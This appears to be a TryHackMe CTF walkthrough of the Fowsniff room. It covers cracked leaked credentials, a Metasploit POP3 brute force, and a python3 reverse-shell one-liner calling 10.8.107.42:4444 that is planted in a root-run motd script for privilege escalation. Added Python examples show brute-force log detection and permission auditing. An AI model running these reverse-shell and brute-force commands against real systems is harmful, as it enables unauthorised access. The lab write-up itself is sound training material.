Fowsniff CTF(Tryhackme) Room Walkthrough By Jonty Bhardwaj
Hello Reader, I am Jonty Bhardwaj, currently enrolled in the Master Certificate in Cyber Security program at HackerU. Today I am sharing a writeup on a TryHackMe machine called Fowsniff CTF.
First of all, we navigate to the room URL and join it.
https://tryhackme.com/room/ctf
After starting the machine, we connect through OpenVPN and ping the machine at the IP we are given to confirm the connection is established. Once the ping succeeds, we start the fun part: pentesting the box and getting root privileges.
First we run an Nmap scan to see which ports and services are open on the machine.
nmap -sV -sT -T4 -A 10.10.168.80
We can see that 4 ports are open, and the most promising one for gathering information looks to be port 80. Let's see what's on the website there.
From the website we gathered that the corporation was hacked recently and that employee credentials have been dumped publicly on its compromised Twitter handle, @fowsniffcorp.
Let's check the Twitter handle for that information and maybe get the leaked credentials for ourselves, in case some employee was too lazy to change their password.
https://twitter.com/fowsniffcorp?lang=en
From the Twitter handle we learned that the corporation was hacked by someone named B1gN1nj4.
From the following tweet we also know that the user stone is the sysadmin.
It also contained a Pastebin dump of employee credentials.
Cracking the MD5 hashes, we got these passwords:
mauer@fowsniff: mailcall
mustikka@fowsniff: bilbo101
tegel@fowsniff: apples01
baksteen@fowsniff: skyler22
seina@fowsniff: scoobydoo2
stone@fowsniff: Not Found
mursten@fowsniff: carp4ever
parede@fowsniff: orlando12
sciana@fowsniff: 07011972
From this Pastebin info we gathered many credentials, which may or may not have been changed since, plus a note that the POP3 server is wide open to be exploited. Looking at our Nmap scan, the POP3 server is indeed still open.
We then created a user file and a password file with the known credentials to feed into the brute force.
Let's try to exploit the POP3 server ourselves by brute-forcing it with a Metasploit module.
msfconsole
use auxiliary/scanner/pop3/pop3_login
show options
set USER_FILE /root/userfile.txt
set PASS_FILE /root/passfile.txt
set RHOSTS 10.10.122.193
run
We got the credentials successfully.
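Since this step relies on mass login attempts against POP3, it is worth seeing what the same activity looks like from the mail server's side. This is an added detection example and not part of the original writeup: it parses constructed Dovecot-style pop3-login log lines (the exact format is an assumption; real wording varies by version, so adjust LINE_RE for your server), flags a source IP that piles up authentication failures across many usernames inside a short window, and records any login that succeeds while that burst is still live, which is the "credential found" signal a mass-login run produces.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in a Dovecot-like pop3-login format (assumption: real
# Dovecot wording varies by version). The IPs match the writeup's lab setup.
SAMPLE_LOG = """\
Mar 09 10:01:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=10.8.107.42, lip=10.10.168.80
Mar 09 10:01:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mustikka>, method=PLAIN, rip=10.8.107.42, lip=10.10.168.80
Mar 09 10:01:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=10.8.107.42, lip=10.10.168.80
Mar 09 10:01:04 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<baksteen>, method=PLAIN, rip=10.8.107.42, lip=10.10.168.80
Mar 09 10:01:04 mail dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=10.8.107.42, lip=10.10.168.80
Mar 09 10:05:00 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<stone>, method=PLAIN, rip=192.0.2.7, lip=10.10.168.80
Mar 09 10:30:00 mail dovecot: pop3-login: Login: user=<stone>, method=PLAIN, rip=192.0.2.7, lip=10.10.168.80
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): "
    r"user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)


def parse_line(line):
    """Return a dict for a pop3-login event, or None for lines we don't model."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),  # syslog has no year
        "ok": m.group("event") == "Login",
        "user": m.group("user"),
        "rip": m.group("rip"),
    }


def detect_pop3_bruteforce(log_text, threshold=3, window_secs=60):
    """Flag source IPs with >= threshold auth failures inside window_secs and
    record any successful login from such an IP while the burst is still live."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    window = timedelta(seconds=window_secs)
    recent = defaultdict(list)  # rip -> [(ts, user)] failures still inside the window
    findings = {}
    for e in events:
        rip = e["rip"]
        # Slide the window: drop failures older than window_secs relative to this event.
        recent[rip] = [f for f in recent[rip] if e["ts"] - f[0] <= window]
        if not e["ok"]:
            recent[rip].append((e["ts"], e["user"]))
        if len(recent[rip]) >= threshold:
            f = findings.setdefault(rip, {"failures": 0, "users": set(), "success_after_burst": []})
            f["failures"] = max(f["failures"], len(recent[rip]))
            f["users"].update(u for _, u in recent[rip])
            if e["ok"]:
                f["success_after_burst"].append(e["user"])
    return {rip: {**f, "users": sorted(f["users"])} for rip, f in findings.items()}


if __name__ == "__main__":
    for rip, f in detect_pop3_bruteforce(SAMPLE_LOG).items():
        print(f"{rip}: {f['failures']} failures across {f['users']}, "
              f"then successful login as {f['success_after_burst']}")
```

The distinct-user count is the useful signal here: one user failing four times is a forgotten password, four users failing from one address in two seconds is a credential list being replayed, and a success right after it is the point at which the mailbox should be treated as read by someone else.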
Connecting to POP3 with the credentials to read the mails:
nc 10.10.168.80 110
USER seina
PASS scoobydoo2
LIST
Here we can see that there are 2 mails; let's read them with the command
RETR 1
As you can see, we have got an SSH password: S1ck3nBluff+secureshell
We also checked the second mail and learned that user baksteen sent it to seina and was sick. So he might not have gone to the office, and his password may still be the same temporary password.
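As an added example that is not part of the original writeup, here is the POP3 exchange above reproduced offline: a tiny in-memory server stub answers USER/PASS/LIST/RETR/QUIT from a constructed mailbox (the two messages are made up, only the seina credentials come from the writeup), and the client-side parser shows the part a raw nc session hides, namely how a multi-line reply is terminated by a lone dot and how body lines that themselves start with a dot are byte-stuffed by the server and unstuffed by the client as RFC 1939 requires.

```python
# Constructed mailbox contents (assumption: made up for this example).
MAILBOX = {
    1: "From: baksteen@fowsniff\r\nTo: seina@fowsniff\r\nSubject: out sick\r\n\r\n"
       "First line of the body.\r\n.A line that starts with a dot.\r\n",
    2: "From: stone@fowsniff\r\nTo: seina@fowsniff\r\nSubject: reminder\r\n\r\nSecond message.\r\n",
}


class FakePop3Server:
    """Minimal in-memory POP3 server: USER/PASS/LIST/RETR/QUIT only."""

    def __init__(self, users, mailbox):
        self.users = users        # {username: password}
        self.mailbox = mailbox    # {message number: raw RFC 822 text}
        self.user = None
        self.authed = False

    def handle(self, cmd_line):
        name, _, arg = cmd_line.partition(" ")
        name = name.upper()
        if name == "USER":
            self.user = arg
            return "+OK\r\n"
        if name == "PASS":
            self.authed = self.users.get(self.user) == arg
            return "+OK Logged in.\r\n" if self.authed else "-ERR [AUTH] Authentication failed.\r\n"
        if name == "QUIT":
            return "+OK Logging out.\r\n"
        if not self.authed:
            return "-ERR Not logged in.\r\n"
        if name == "LIST":
            rows = [f"{n} {len(self.mailbox[n].encode())}" for n in sorted(self.mailbox)]
            return f"+OK {len(rows)} messages:\r\n" + "".join(r + "\r\n" for r in rows) + ".\r\n"
        if name == "RETR":
            msg = self.mailbox.get(int(arg)) if arg.isdigit() else None
            if msg is None:
                return "-ERR No such message.\r\n"
            body_lines = msg.split("\r\n")
            if body_lines[-1] == "":
                body_lines.pop()
            # RFC 1939 byte-stuffing: a body line beginning with '.' is sent as '..'
            stuffed = "".join(("." + l if l.startswith(".") else l) + "\r\n" for l in body_lines)
            return f"+OK {len(msg.encode())} octets\r\n" + stuffed + ".\r\n"
        return "-ERR Unknown command.\r\n"


def is_multiline(cmd_line):
    """Commands whose +OK reply continues until a line holding a single '.'."""
    name, _, arg = cmd_line.partition(" ")
    name = name.upper()
    return name in {"RETR", "TOP", "CAPA"} or (name in {"LIST", "UIDL"} and not arg)


def parse_response(cmd_line, raw):
    """Client side: split a reply into (ok, status_line, body_lines), unstuffing dots."""
    status, _, rest = raw.partition("\r\n")
    ok = status.startswith("+OK")
    if not ok or not is_multiline(cmd_line):
        return ok, status, []
    body = []
    for line in rest.split("\r\n"):
        if line == ".":          # lone dot terminates the multi-line response
            break
        body.append(line[1:] if line.startswith(".") else line)  # undo byte-stuffing
    return ok, status, body


def run_session(server, commands):
    """Send each command in turn; return a list of (command, ok, status, body)."""
    out = []
    for cmd in commands:
        ok, status, body = parse_response(cmd, server.handle(cmd))
        out.append((cmd, ok, status, body))
    return out


def demo():
    server = FakePop3Server({"seina": "scoobydoo2"}, MAILBOX)   # credentials from the writeup
    return run_session(server, ["USER seina", "PASS scoobydoo2", "LIST", "RETR 1", "QUIT"])


if __name__ == "__main__":
    for cmd, ok, status, body in demo():
        print(f"C: {cmd}\nS: {status}" + "".join(f"\nS: {l}" for l in body))
```

The unstuffing step is the one that matters when you script this instead of typing it into nc: a client that stops at the first line starting with a dot truncates any message containing one, and a client that never strips the extra dot corrupts it.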
Let's try to log in over SSH as user baksteen with the temporary password.
ssh baksteen@10.10.168.80
And voilà, we have got access to user baksteen's workspace.
After searching, we found a file named term.txt.
cat term.txt
The file suggests we look for other phrases by the person who coined the term “One Hit Wonder”.
We then searched for files belonging to the users group that our user can run:
find / -type f -group users 2>/dev/null
Right at the start we found an interesting shell script; let's see if we can use this file to get a reverse shell.
So now we will try to use this file to run our reverse shell.
which python3
We can see that python3 is installed, so a python3 reverse shell will work.
nano cube.sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.107.42",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We have successfully created a script with a python reverse shell in it, but we need someone with higher privileges to run the script, or another file running with higher privileges to execute it, in order to escalate our privileges.
We know that when we connect via SSH, cube.sh is executed to print a Fowsniff Corp banner, and that cube.sh is called from another script. Maybe we can find the controlling script.
cd /etc/update-motd.d/
As we can see, there is a script named 00-header which calls the cube.sh script.
And we can see that these files are created by root; a normal user has only read and execute permissions on them.
Now if we log in again over SSH, the new cube.sh will be executed by the 00-header script with root permissions, and we will get a reverse shell back with root permissions.
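The root cause here is a root-executed login script calling a file that an unprivileged group can write. The following added example (not from the writeup) audits that pattern the way a defender would: it walks an update-motd.d directory, checks each script and every absolute path the script invokes for untrusted ownership, group-writability or world-writability, and then shows the hardened permissions clearing the finding. It builds a throwaway copy of the layout under a temp directory; because it cannot chown to root, the current user stands in for root, and the trusted_uid/trusted_gid parameters are this example's own (on a real host you would pass 0 and 0).

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned in a script, enough for "sh /path/x.sh" style calls.
PATH_RE = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def unsafe_reasons(path, trusted_uid, trusted_gid):
    """Why a file executed at login by the privileged account could be altered
    by someone else. trusted_gid=None means no group is trusted to write."""
    st = os.lstat(path)
    mode = stat.S_IMODE(st.st_mode)
    reasons = []
    if stat.S_ISLNK(st.st_mode):
        reasons.append("is a symlink; the target could be swapped")
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}, not the trusted uid {trusted_uid}")
    if mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        reasons.append(f"group-writable by gid {st.st_gid} (mode {mode:o})")
    if mode & stat.S_IWOTH:
        reasons.append(f"world-writable (mode {mode:o})")
    return reasons


def audit_motd_dir(motd_dir, trusted_uid=0, trusted_gid=0):
    """Check every update-motd.d script and every absolute path it invokes."""
    findings = []
    for name in sorted(os.listdir(motd_dir)):
        script = os.path.join(motd_dir, name)
        if not os.path.isfile(script):
            continue
        findings += [(script, r) for r in unsafe_reasons(script, trusted_uid, trusted_gid)]
        with open(script, errors="replace") as fh:
            code = "".join(l for l in fh if not l.lstrip().startswith("#"))  # skip shebang/comments
        for ref in sorted(set(PATH_RE.findall(code))):
            if os.path.isfile(ref):
                findings += [(ref, f"called from {name}: {r}")
                             for r in unsafe_reasons(ref, trusted_uid, trusted_gid)]
    return findings


def harden(path):
    """Drop group/other write bits so only the owner can change the script."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_IWGRP | stat.S_IWOTH))


def run_demo():
    """Build a throwaway copy of the Fowsniff layout and audit it before and
    after hardening. Paths and file contents are constructed for this example."""
    base = tempfile.mkdtemp(prefix="motd-audit-")
    motd_dir = os.path.join(base, "etc", "update-motd.d")
    home = os.path.join(base, "home", "baksteen")
    os.makedirs(motd_dir)
    os.makedirs(home)
    cube = os.path.join(home, "cube.sh")
    with open(cube, "w") as fh:
        fh.write("#!/bin/sh\necho 'Fowsniff Corp banner'\n")
    os.chmod(cube, 0o664)                       # group-writable, as found on the box
    header = os.path.join(motd_dir, "00-header")
    with open(header, "w") as fh:
        fh.write(f"#!/bin/sh\nsh {cube}\n")     # root-run banner script calls the group-writable file
    os.chmod(header, 0o755)
    # The demo cannot chown to root, so the current user stands in for root and
    # no group is trusted; on a real host use trusted_uid=0, trusted_gid=0.
    uid = os.getuid()
    before = audit_motd_dir(motd_dir, trusted_uid=uid, trusted_gid=None)
    harden(cube)
    after = audit_motd_dir(motd_dir, trusted_uid=uid, trusted_gid=None)
    return cube, before, after


if __name__ == "__main__":
    cube, before, after = run_demo()
    for path, reason in before:
        print(f"[!] {path}: {reason}")
    print("after hardening:", after or "no findings")
```

Following the call chain is the important part: 00-header itself was root-owned and 0755, so a check limited to /etc/update-motd.d would have passed; the weak link was one level down, in a file the script pulled in from a user's group.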
Now logging back in over SSH:
ssh baksteen@10.10.70.63
As soon as we log in as user baksteen, we get a reverse shell on our listener with root privileges:
nc -lnvp 4444
cat /root/flag.txt
Here we have successfully escalated to a root shell after using the exploit and found the root flag in the root folder.
Proof of Completion